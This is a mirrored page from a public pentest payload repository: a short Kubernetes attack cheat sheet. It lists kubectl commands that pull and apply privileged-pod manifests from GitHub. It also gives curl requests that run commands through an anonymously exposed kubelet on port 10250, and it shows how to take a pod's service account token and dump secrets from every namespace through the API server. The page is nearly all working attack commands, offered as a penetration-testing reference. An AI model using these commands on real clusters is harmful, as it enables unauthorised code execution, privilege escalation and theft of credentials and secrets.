wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-23 21:36:09 +02:00
Code Issues Releases Activity
PayloadsAllTheThings/Methodology and Resources/Container - Kubernetes Pent...
2022-11-18 13:00:11 +01:00

2.5 KiB
Raw Blame History

Container - Kubernetes Pentest

Kubernetes commonly stylized as K8s) is an open-source container orchestration system for automating software deployment, scaling, and management.

Summary

Tools

  • BishopFox/badpods - A collection of manifests that will create pods with elevated privileges. 
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml
  • serain/kubelet-anon-rce

Accessible kubelet on 10250/TCP

Requirements:

  • --anonymous-auth: Enables anonymous requests to the Kubelet server

  • Getting pods: curl -ks https://worker:10250/pods

  • Run commands: curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'

Obtaining Service Account Token

Token is stored at /var/run/secrets/kubernetes.io/serviceaccount/token

Use the service account token:

  • on kube-apiserver API: curl -ks -H "Authorization: Bearer <TOKEN>" https://master:6443/api/v1/namespaces/{namespace}/secrets
  • with kubectl: kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="<TOKEN>" get secrets --all-namespaces -o json

References